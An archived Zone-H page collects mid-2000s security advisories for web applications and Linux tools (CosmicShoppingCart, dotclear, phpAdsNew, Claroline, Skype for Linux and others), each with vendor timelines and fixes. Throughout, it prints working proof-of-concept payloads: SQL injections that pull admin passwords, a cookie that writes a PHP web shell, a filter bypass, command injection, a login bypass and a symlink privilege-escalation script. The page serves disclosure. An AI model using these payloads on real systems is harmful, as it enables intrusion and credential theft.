|
|
 |
|
|
|
|
|
|
IT is Zone-H's contribution to the IT security world. It is a tool for keeping always up to date administrators and ITsec professionals. It's cool. It's free. It's the InfoSec pager.
|
|
|
| ZH2006-20 SA: CosmicShoppingCart Multiple Vulnerabilities |
|
05/26/2006
Software: CosmicShoppingCart (www.cosmicphp.com)
Risk: Medium
Discovered by: Vympel (Marcelo Almeida)
Background: CosmicShoppingCart is a PHP / MySQL e-commerce system. It is a fully customizable, shopping cart designed.
Description:
Multiple Cross site scripting and SQL injection vulnerabilities have been found in CosmicShoppingCart.
Details:
1)Multiple Cross site scripting vulnerabilities have been found in the following pages:
cosmicshop/search.php
cosmicshop/search_cat.php
cosmicshop/search_price.php
cosmicshop/product_details.php
Examples:
cosmicshop/search.php?query=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
cosmicshop/search_cat.php=doc&data=%3Cscript%3Ealert('xss');%3C/script%3E
2)SQL injections have been found, they could be exploited by users to retrieve the passwords of the admin.
Examples:
cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/*
cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs--
Solution:
Edit the source code to ensure that input is properly sanitised.
Vendor: First contact 16/02/2005
Contacted again in 25/03/2005
Publish advisory 25/05/2006 |
|
|
| ZRCSA-200505: libremail - "pop.c" Format String Vulnerability |
|
12/16/2005
Zone-H Research Center Security Advisory 200505
http://www.zone-h.fr
Date of release: 16/12/2005
Software: libremail (http://libremail.tuxfamily.org/en/)
Affected versions: <= 1.1.0
Risk: Low/Medium
Discovered by: Mehdi Oudad "deepfear" from the Zone-H Research Team
Background
----------
libremail is a set of command line mail tools, it includes several clients, and allows to filter mails.
from http://libremail.tuxfamily.org/en/trad.htm :
This web site is intended to present to you the whole part of applications of electronic mail I developed.
These softwares functions under GNU/Linux and should normaly run without any modification under the other UNIX systems.
On the other hand, I did not consider it useful (and a fortiori priority) to adapt these applications to make them run also under Windows.
Details
--------
There is a format string vulnerability in pop.c:
[...]
void lire_pop ()
{
int posbuf;
// initialisation
posbuf = 0;
// lecture jusqu'en fin de ligne ou de buffer
do
recv (sockfd, buf_lect + posbuf, 1, 0);
while (buf_lect [posbuf++] != '\n' && posbuf < sz_buflect);
// terminer la chaine de caractères lue (on supprime \r\n)
if (posbuf > 1 && buf_lect [posbuf - 2] == '\r')
buf_lect [posbuf - 2] = '\0';
else
buf_lect [posbuf - 1] = '\0';
#ifdef DEBUG
putchar ('<');
printf (buf_lect);
#endif
}
It could be exploited by tricking a user into connecting to a malicious pop server, or by sending a malicious mail (if the user reads it through a pop server), however it requires that debug mode is activated (not default setting).
Solution
---------
The vendor has published updated sources:
http://libremail.tuxfamily.org/en/dersources.htm
They will also be included in an upcoming version (with other bugfixes and new features).
|
|
|
| ZH2005-18SA: Php-Nuke Platinum patched with Nuke Sentinel Sql Injection |
|
12/12/2005
Php-Nuke Platinum is a fork of Php-Nuke designed to be more secure and stable, after the maker Tech-gfx abandones the project another group made patches and removed the stock protector system and installed sentinel. In that time this old search query sql injection was never fixed as they assumed NukeSentinel would block it. Now there is a way to get by Nuke Sentinel all Php-Nuke Platinum sites with sentinel and search module active are vulnerable. There is no patch for the Php-Nuke Platinum at the time.
Exploit:
It has been discovered that an older exploit modified to bypass Nuke Sentinel is now effecting Php-Nuke Platinum sites with all patches and Nuke Sentinel.
It is and Sql inection into search query, Example:
www.target.com/modules.php?name=Search&type=comments&query=not123exists&instory=/%2a%2a/UNION/%2a%2a/ SELECT/%2a%2a/0,0,pwd,0,aid/%2a%2a/FROM/%2a%2a/nuke_authors
UPDATE: Fix: Update sentinel with fix from www.ravenphpscripts.com or patch from www.platinummods.com |
|
|
| ZH2005-17SA: Nuke Sentinel Php-Nuke Security Script Bypass |
|
12/12/2005
NukeSentinel is a security script for Php-Nuke sites for blocking hacking attempts. The creators are Bob Marion from www.nukescripts.net and Raven from http://ravenphpscripts.com It is supposed to block all strings used in sql injection and scripting attacks.
It has been discovered an attacker can bypass nukesentinel for any kind of attack by using %2a%2a in a query instead of the ** or ( ) that Nuke Sentinel alerts on. Example:
www.target.com/modules.php?name=[module name]&file=search&bywhat=aid&exact=1&forwhat=kala%27/%2a%2a/[Script]
Other scripts such as protector and admin secure will stop this.
UPDATE: Fix has been issued at http://www.ravenphpscripts.com/postt7705.html Although it is advised to keep current on all patches available from http://www.nukeresources.com
|
|
|
| ZRCSA-200504 - dotclear SQL Injection |
|
12/01/2005
ZRCSA-200504 - dotclear SQL Injection
Zone-H Research Center Security Advisory 200504
http://www.zone-h.fr
Date of release: 30/11/2005
Software: dotclear (http://www.dotclear.net)
Affected versions: <= 1.2.2
Risk: Medium
Discovered by: Kevin Fernandez "Siegfried" from the Zone-H Research Team
Background
----------
dotclear is a weblog written in PHP.
from http://www.dotclear.net/en/features.html :
Code conforms to the W3C standards, including XHTML 1.0
Use of CSS
URL significant
RSS and Atom feeds
[...]
Details
--------
The $ses_id variable isn't filtered before being used in SQL queries
in /inc/session.php :
[...]
function _read($ses_id)
{
$strReq = 'SELECT * FROM '.$this->table.' '.
'WHERE ses_id = \''.$ses_id.'\' ';
$rs = $this->con->select($strReq);
[...] (and other queries in the same file, with the same variable)
Since this file is used in all the pages, it can be used to perform
arbitrary SQL queries by opening a page (for example index.php) with
the following cookie:
dc_xd=siegfried'/**/UNION/**/SELECT
user_id,user_pseudo,user_nom,user_email from dc_user into outfile
"/var/www/blah"/*
or:
dc_xd=siegfried'/**/UNION/**/SELECT "<? system($_GET[blah])
?>","","","" from dc_user into outfile "/var/www/dotclear/blah.php"/*
We can gather the path of dotclear by accessing multiple files
directly in the admin area, for example /ecrire/inc/connexion.php ,
this might help to exploit the SQL injection.
Solution
---------
Update to version 1.2.3 or replace /inc/session.php with the new version:
https://www.dotclear.net/svn/branches/1.2.3-stable/inc/session.php
http://www.dotclear.net/download/dotclear-1.2.3.tar.gz
(vendor contacted on 30/11 and patch released on the same day). |
|
|
| ZRCSA 200503: Ktools Buffer Overflow Vulnerability |
|
11/27/2005
Zone-H Research Center Security Advisory 200503
http://www.zone-h.fr
Date of release: 27/11/2005
Software: ktools (http://konst.org.ua/ktools)
Affected versions: <= 0.3
Risk: Medium
Discovered by: Mehdi Oudad "deepfear" and Kevin Fernandez "Siegfried" from the Zone-H Research Team
Background (from http://konst.org.ua/ktools)
----------
ktools is a library which I wrote for my own programming needs, though its main purpose is to provide various text-mode user interface controls without a need to write too much code.
Details
--------
There is a buffer overflow in kkstrtext.h :
#define VGETSTRING(c, fmt) \
{ \
va_list vgs__ap; char vgs__buf[1024]; \
va_start(vgs__ap, fmt); \
vsprintf(vgs__buf, fmt, vgs__ap); c = vgs__buf; \
va_end(vgs__ap); \
}
This library is used in the following softwares:
centericq
orpheus
motor
groan
(see http://konst.org.ua/en/konstware)
It can be exploited for example in centericq when editing a contact's details with a detail field longer than 1024 chars (a <description> field of a rss feed for example).
Details:
- centericq.cc :
case ACT_EDITUSER:
c->save();
/***************** here************/
if(face.updatedetails(c, c->getdesc().pname)) {
if(c->getdesc().pname == infocard)
c->setdispnick(c->getnick());
...
...
- icqdialogs.cc :
bool icqface::updatedetails(icqcontact *c, protocolname upname) {
...
...
while(!finished) {;
gendetails(db.gettree(), c);
...
...
gendetails()
..
if((capab.count(hookcapab::flexiblereg) && ri.params.empty()) || !capab.count(hookcapab::flexiblereg)) {
i = tree->addnode(_(" About "));
tree->addleaff(i, 0, 39, " %s ", about.c_str());
- treeview.cc :
int treeview::addleaff(int parent, int color, int ref, const char *fmt, ...) {
string buf;
VGETSTRING(buf, fmt);
return addleaf(parent, color, (void *) ref, buf);
}
- kkstrtext.h :
#define VGETSTRING(c, fmt) \
{ \
va_list vgs__ap; char vgs__buf[1024]; \
va_start(vgs__ap, fmt); \
vsprintf(vgs__buf, fmt, vgs__ap); c = vgs__buf; \
va_end(vgs__ap); \
}
Solution
---------
None. Vendor contacted on 18/11 and 25/11, no answer. |
|
|
| ZRCAS 200502: phpAdsNew SQL Injections |
|
11/11/2005
ZRCSA-200502 - phpAdsNew SQL Injection Vulnerabilities
Zone-H Research Center Security Advisory 200502
http://www.zone-h.fr
Date of release: 11/11/2005
Software: phpAdsNew (www.phpadsnew.com)
Affected versions:
<= 2.0.6
2.0.7rc1 (latest CVS snapshot)
Risk: Medium
Discovered by: Kevin Fernandez "Siegfried" from the Zone-H Research Team
Background (from their web site)
----------
phpAdsNew is an open-source ad server, with an integrated banner management interface and tracking system for gathering statistics. With phpAdsNew you can easily rotate paid banners and your own in-house advertisements. You can even integrate banners from third party advertising companies.
Details
--------
Toni Koivunen has published an advisory yesterday regarding a vulnerability exploitable via /admin/logout.php, that can be used to delete arbitrary data (maybe more). However more sql injections are present in this part of the code, all the functions in /admin/lib-sessions.inc.php do not check the "sessionID" variable coming from the cookie, the most interesting is phpAds_SessionDataFetch() because it is called in config.php and makes a simple SELECT query.
Snip:
[no previous check]
if (isset($HTTP_COOKIE_VARS['sessionID']) && $HTTP_COOKIE_VARS['sessionID'] != '')
{
$result = phpAds_dbQuery("SELECT sessiondata FROM ".$phpAds_config['tbl_session']." WHERE sessionid='".$HTTP_COOKIE_VARS['sessionID']."'" .
" AND UNIX_TIMESTAMP(NOW())-UNIX_TIMESTAMP(lastused) < 3600"); <-- ouch
Since /admin/config.php is included in /admin/index.php, we don't need to be authenticated to exploit the vulnerability.
PoC (cookie):
sessionID=adsds'/**/UNION/**/SELECT admin_pw from phpads_config into outfile "/var/www/blah.txt"/*;
Just "exploit" one of the many errors in the pages to get the path and here you go, open /admin/index.php with that as cookie.
Solution
---------
No patch.
Filter the variable in the affected functions.
Original advisories:
English version: http://www.zone-h.org/en/advisories/read/id=8413/
French: http://www.zone-h.fr/fr/advisories/read/id=674/ |
|
|
| [ZH2005-16SA] Skype for Linux - Insecure temporary file creation |
|
07/15/2005
[ZH2005-16SA] Skype for Linux - Insecure temporary file creation
Application: Skype for Linux
Version affected: <= 1.1.0.20
Vendor website : http://www.skype.com
Author: Giovanni Delvecchio
e-mail: badpenguin@zone-h.org
About Skype
=========
Skype is a free program that uses the latest P2P technology to bring affordable and high-quality voice communications to people all over the world.It also provides a service of Instant Messaging.
Details
=====
Each user has his own profile which can be personalized with a picture. When a user adds a picture for his profile, Skype creates in /tmp directory a file named "skype_profile.jpg" in an insecure manner, without checking if the file already exists and if it's a symbolic link.
-----------------------------------------------------------------------------------------------------------------------------------------
bad@badpenguin:~/skype-1.1.0.20$ strace -e trace=open skype
.
.
open("/home/bad/image.jpg", O_RDONLY|O_LARGEFILE) = 21 // picture chosen by user
open("/tmp/skype_profile.jpg", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE, 0666) = 23 // insecure temporary file creation (it should use O_EXCL or O_NOFOLLOW flag)
.
.
------------------------------------------------------------------------------------------------------------------------------------------
This could represent a security problem in a multi-user environment because usually /tmp directory is "world-writable".
Indeed, such problem could be exploited by a malicious local user via symlink attack to overwrite arbitrary files with the privileges of the user that running Skype.
Example:
ln -s file_to_overwrite /tmp/skype_profile.jpg
When the user will add a picture for his profile , the file symlinked by attacker will be overwritten with the file content that the user has chosen to update his profile.
In certain conditions a privilege escalation is possible.
An example of privilege escalation exploiting this type of vulnerability is the following:
from http://www.securityfocus.com/archive/82/327361/2003-06-29/2003-07-05/0 :
"Starting release 9, Red Hat ships and uses pam_timestamp_check.so module
(accompanied by /sbin/pam_timestamp_check setuid helper), a part of the
new pam-0.75 (Pluggable Authentication Modules) package. PAM is a generic
centralized authentication and session management component that is also
shipped by an increasing number of other distributions, so it is
reasonable that the code is about to propagate to other distros.
The module mentioned implements a credential caching functionality, very
closely inspired on a tty ticketing system used in sudo.
The way the module works(and sudo), in essence, is that it gets current
pseudo-terminal name A, current user name B, and the user for which
credentials are cached, C (usually root for Red Hat applications, user
himself for sudo). Then the code checks for /var/run/sudo/B/A:C (or
/var/run/sudo/B/A if B == C), and if the file is recent (regardless of its content), the module returns success, and enables the user to skip the usual password
authentication.
Since there's no check for file origin, it should be more than obvious that suddenly, any insecure file creation problem in an application used by a superuser,it is possible to spoof a ticket in /var/run and bypass root password prompt and other checks, and perform administrative tasks, easily modifying system config, installing custom components (say, a rootshell), etc. All this by
crafting a single symlink that is later opened with O_CREAT with no O_EXCL
or O_NOFOLLOW."
Example:
----------------------------------------------------------------------------------------
#!/bin/sh
#get current terminal number from /dev/pts/xx
terminal_number=`tty | cut -f4 -d '/'`
user_ticket=$USER/$terminal_number:root
ln -s /var/run/sudo/$user_ticket /tmp/skype_profile.jpg
---------------------------------------------------------------------------------------------
Solution
======
No fix available at the moment;
Grant only trusted users writing access to /tmp directory .
Timeline
======
April 7th 2005 - bug dicovered
April 8th 2005 - Skype contacted by security@skype.net
April 15th 2005 - 1st Response from Skype:
"Thank you for the email, we will pass it on to our developers.
Regards,
Andres"
May 25th 2005 - Skype for Linux version 1.1.0.13 released, the problem is present again.
May 27th 2005 - Skype re-contacted by security@skype.net
May 27th 2005 - 2nd Response from Skype:
"Giovanni, Thank you for the email again. I've spoken to our Linux developers and they assure me this will be fixed in the next version and they are considering posting an immediate advisory.
Again, your help is appreciated.
Regards,
Andres"
July 5th 2005 - Skype for Linux version 1.1.0.20 released, but the bug hasn't been fixed.
July 15th 2005 - Public advisory
Author's Note
==========
Although this type of vulnerability isn't a problem for a single desktop user, instead it could represent a problem in a multi user environment.
For example, Skype is used by many companies with some hundred of employees, and in such environment several users have an access on an host, locally or remotely . Any user,even with low privileges, could exploit this type vulnerabily to overwrite or create arbitrary files with the privileges of the user that running Skype, and in certain case conduct a privilege escalation.
A study made by CERT (Computer Emergency Response Team) called ITS (Insider Thread Study) shows like many times the incidents in companies are pepetrated by insider (eg. current or former employees ).
So, i think that in these conditions this bug may represent a security problem , and Skype should fix it quickly.
Reference
=======
http://www.zone-h.org/advisories/read/id=7808 |
|
|
| ZH2005-15SA (security advisory): Onpumoe Global Note Script read.cgi version 4.20 Remote Arbitrary Command Execution Vulnerability |
|
07/04/2005
ZH2005-15SA (security advisory): Onpumoe Global Note Script read.cgi version 4.20 Remote Arbitrary Command Execution Vulnerability
Discovered by: Nicola (AcidCrash) Ballotta
Released: 04 07 2005
Name: Global Note Script
Affected Systems: 4.20 and previous
Issue: Remote Arbitrary Command Execution
Author:
SPAX and AcidCrash of ZetaLabs, Zone-h Laboratories - www.zone-h.org
SPAX@zone-h.org - techflow@gmail.com - zetalabs@zone-h.org
Description
*******************************************************
object: read.cgi
class: Input Validation Error
Global Note Script is a cgi based online bbs board suite in japanese language. http://onpumoe.hp.infoseek.co.jp/
A remote command execution vulnerability has been discovered in the GNS Application by ZetaLabs, Zone-H Laboratories.
This issue occurs due to insufficient sanitization of externally supplied data to the read.cgi script that allows a remote user to pass an arbitrary shell command to be executed by the script. An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script.
This vulnerability has been reported to affect the version 4.20 of read.cgi.
The following exploit is provided
http://www.example.com/cgi-bin/bbs/read.cgi?file=|uname%20-a|&bbs_id=00001 |
|
|
| [ZH2005-14SA] Phishing problems on MSN |
|
07/01/2005
[ZH2005-14SA] Phishing problems on MSN
Date: July 1th 2005
Author:Giovanni Delvecchio
email: badpenguin@zone-h.org
Overview
=======
Multiple phishing problems exist on support.msn.com, permitting to a possible attacker to conduct phishing attack against a user.
Details
=====
1)Input passed to the "ru" parameter in "pplogin.aspx" isn't properly
sanitised before being returned to the user
Example:
http://support.msn.com/pplogin.aspx?ru=http://www.evil- site.com">www.msn.com/
or
http://support.msn.com/pplogin.aspx?ru=%68%74%74%70%3A%2F%2F%77%77%77% 2E%65%76%69%6C%2D%73%69%74%65%2E%63%6F%6D%22%3E%77%77%77%2E%6D%73%6E% 2E%63%6F%6D/
The problem has been fixed today.
Here is possible see a screen shot
http://www.zone-h.org/files/44/msn1.jpg
2)Input passed to the 'mspplogin' parameter isn't properly sanitised, and by
using specialy crafted URL an attacker can cause the user to be redirected
to an arbitrary URL for the passport authentication.
Example:
http://support.msn.com/pplogin.aspx?msppchlg=1&mspplogin=http://www.evil-site.com/login.srf%3F
This problem at the moment has not been fixed.
Reference
=======
http://www.zone-h.org/advisories/read/id=7764
UPDATE - July 4th 2005
===============
Another phishing problem exists on login.passport.net.The problem is
caused due to input passed to the "ru" in "uilogout.srf" isn't properly sanitised.
By using specialy crafted URL an attacker can cause the user to be redirected to an arbitrary URL for the passport authentication.
Example:
http://login.passport.net/uilogout.srf?id=2&ru=http://www.evil-site.com&ec=1
http://login.passport.net/uilogout.srf?id=2&ru=%68%74%74%70%3A%2F%2F%77%77%77%2E%65%76%69%6C%2D%73%69%74%65%2E%63%6F%6D&ec=1 |
|
|
| Dokeos: Multiple Vulnerabilities |
|
06/17/2005
From: siegfried_at_zone-h.org
2 months ago we published an advisory about the Claroline application:
http://www.zone-h.org/advisories/read/id=7472
Dokeos (www.dokeos.com) 1.5.5 has the same vulnerabilities than
Claroline because it was based on it, but not all of them:
there are 3 file inclusion vulnerabilities, and some of the directory
traversal, SQL injection and XSS vulnerabilities that we reported in
Claroline (didn't check more).
Previous versions are probably also affected.
We mailed the Dokeos staff (www.dokeos.com) on the same day (22/04).
The vendor now confirmed that all the vulnerabilities are fixed in
version 1.6 RC2 which is available here:
http://www.dokeos.com/download.php |
|
|
| [ZH2005-13SA] NEXTWEB (i)Site™ website management multiple vulnerabilities |
|
06/01/2005
ZH2005-13SA (security advisory): NEXTWEB (i)Site™ multiple vulnerabilities
Published: 1 June 2005 - GOOD MONTH EVERYBODY ;-)
Released: 1 June 2005
Name: (i)Site™
Affected Versions: ALL
Issue: SQL injections, exception handling, unsafe directories
Author: Trash-80 - dpangalos@zone-h.org
Vendor: http://www.nextweb.gr & http://www.isite.gr
Description
***********
Zone-H Security Team has discovered multiple vulnerabilities in (i)Site website management system. An expensive web application with high-profiled customers. Unsafe directories, SQL injection vulnerabilities, failures to validate user inputs and to handle exceptional conditions were found in (i)Site.
Details
*******
1. SQL injection in login.asp
You are able to bypass the authentication process by sending a crafted
username and password that changes the SQL query in login.asp and thus
grants you with access to the administration of (i)Site.
e.g. www.victim.com/admin/login.asp
usename: attacker
password: \' or \'a\'=\'a
2. Databases are not located in a safe directory. Remote scanners used for malicious intends are checking for unsafe database directories. Locating the databases out of the webroot is a good solution. Thus, downloading Users.mdb file discloses me the administrator\'s username and password.
e.g www.victim.com/databases/Users.mdb
3. Failure to handle exceptional conditions and validating user inputs. The following will cause an error 500 for a few minutes.
e.g. www.victim.com/isite/page/*.asp?mu=&cmu=\'
Solution:
*********
Vendor has been contacted on May 24th.
Since then, vendor did not reply to a series of e-mails informing him about the vulnerabilities in (i)Site.
UPDATE: Vendor replied today(1st June) claiming that corrections have been applied to (i)Site.
Trash-80 form Zone-H Security Labs - dpangalos@zone-h.org - zetalabs@zone-h.org |
|
|
| ZRCSA-200501 - Multiple vulnerabilities in Claroline |
|
04/27/2005
Zone-H Research Center Security Advisory 200501
http://fr.zone-h.org
Date of release: 27/04/2005
Software: Claroline (www.claroline.net)
Affected versions:
1.5.3
1.6 beta
1.6 Release Candidate 1
(probably previous versions too)
Risk: High
Discovered by:
Kevin Fernandez "Siegfried"
Mehdi Oudad "deepfear"
from the Zone-H Research Team
Background (from their web site)
----------
Claroline is an Open Source software based on PHP/MySQL. It's a collaborative learning environment allowing teachers or education institutions to create and administer courses through the web.
Description
-----------
Multiple Cross site scripting, 10 SQL injection, 7 directory traversal and 4 remote file inclusion vulnerabilities have been found in Claroline.
Details
-------
1)Multiple Cross site scripting vulnerabilities have been found in the following pages:
claroline/exercice/exercise_result.php
claroline/exercice/exercice_submit.php
claroline/calendar/myagenda.php
claroline/calendar/agenda.php
claroline/tracking/user_access_details.php
claroline/tracking/toolaccess_details.php
claroline/learnPath/learningPathList.php
claroline/learnPath/learningPathAdmin.php
claroline/learnPath/learningPath.php
claroline/tracking/userLog.php
[..]
Examples:
claroline/tracking/toolaccess_details.php?tool=%3Cscript%3Ealert('xss');%3C/script%3E
claroline/tracking/user_access_details.php?cmd=doc&data=%3Cscript%3Ealert('xss');%3C/script%3E
claroline/calendar/myagenda.php?coursePath=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
[..]
2)10 SQL injections have been found, they could be exploited by users to retrieve the passwords of the admin, arbitrary teachers or students.
claroline/learnPath/learningPath.php (3)
claroline/tracking/exercises_details.php
claroline/learnPath/learningPathAdmin.php
claroline/tracking/learnPath_details.php
claroline/user/userInfo.php (2)
claroline/learnPath/modules_pool.php
claroline/learnPath/module.php
Examples:
claroline/user/userInfo.php?uInfo=-1%20UNION%20SELECT%20username,password,0,0,0,0,0%20from%20user%20where%20user_id=1/*
claroline/tracking/exercises_details.php?exo_id=-1/**/UNION/**/SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=1--
[..]
3)Multiple directory traversal vulnerabilities in "claroline/document/document.php" and "claroline/learnPath/insertMyDoc.php" could allow project administrators (teachers) to upload files in arbitrary folders or copy/move/delete (then view) files of arbitrary folders by performing directory traversal attacks.
4)Four remote file inclusion vulnerabilities have been discovered.
Solution
--------
The Claroline users are urged to update to version 1.54 or 1.6 final:
http://www.claroline.net/download.htm
See also:
http://www.claroline.net/news.php#85
http://www.claroline.net/news.php#86
Timeline
--------
18/04 Vulnerabilities found
22/04 Vendor contacted (quick answer)
25/04 Claroline 1.54 released
26/04 Claroline 1.6 final released
27/04 Users alerted via the mailing list
27/04 Advisory released
French version available here: http://fr.zone-h.org/fr/advisories/read/id=180/
English version: http://www.zone-h.org/advisories/read/id=7472
Zone-H Research Center
http://fr.zone-h.org
Join us on #zone-h @ irc.eu.freenode.net
You can contact the team leader at deepfear@fr.zone-h.org
Thanks to University Montpellier 2. |
|
|
| [ZH2005-12SA] sNKenjoi's Security Advisory: SQL Injection & Full Path Disclosure in phpBB Auction |
|
04/21/2005
Security Advisory: SQL Injection & Full Path Disclosure in phpBB Auction
Severity: Medium
Title: SQL Injection & Full Path Disclosure in phpBB Auction
Versions
phpBB: Any Version
Auction Mod: Version 1.2m (and below)
Vendor: phpBB-Auction
Vendor Website: http://www.phpbb-auction.com/
Proof of Concept Exploits:
SQL Injection (Full Path Disclosure also works sometimes)
http://localhost/auction_rating.php?mode=view&u='
http://localhost/auction_offer.php?mode=add&ar='
Full Path Disclosure
http://localhost/auction_myauctions.php?mode=f00b4r
(For some you will have to be logged in)
snkenjoi.com & zone-h.org
snkenjoi@gmail.com |
|
|
| [ZH2005-11SA] sNKenjoi's Security Advisory: XSS Vunerabilities in PortalApp v3.3 |
|
04/19/2005
sNKenjoi's Security Advisory: XSS Vunerabilities in PortalApp v3.3
Security Advisory: XSS Vunerabilities in PortalApp v3.3
Severity: Medium
Title: XSS Vunerabilities in PortalApp v3.3
Vendor: Iatek
Vendor Website: http://www.portalapp.com/
Proof of Concept Exploits:
XSS
http://localhost/content.asp?contenttype=[XSS]
Syntax Error
http://localhost/content.asp?ContentId=..
http://localhost/content.asp?CatId=..
http://localhost/search_content.asp?ContentTypeId=..
http://localhost/forums.asp?ForumId=..
snkenjoi.com & zone-h.org
snkenjoi@gmail.com |
|
|
|
|
|
|
|
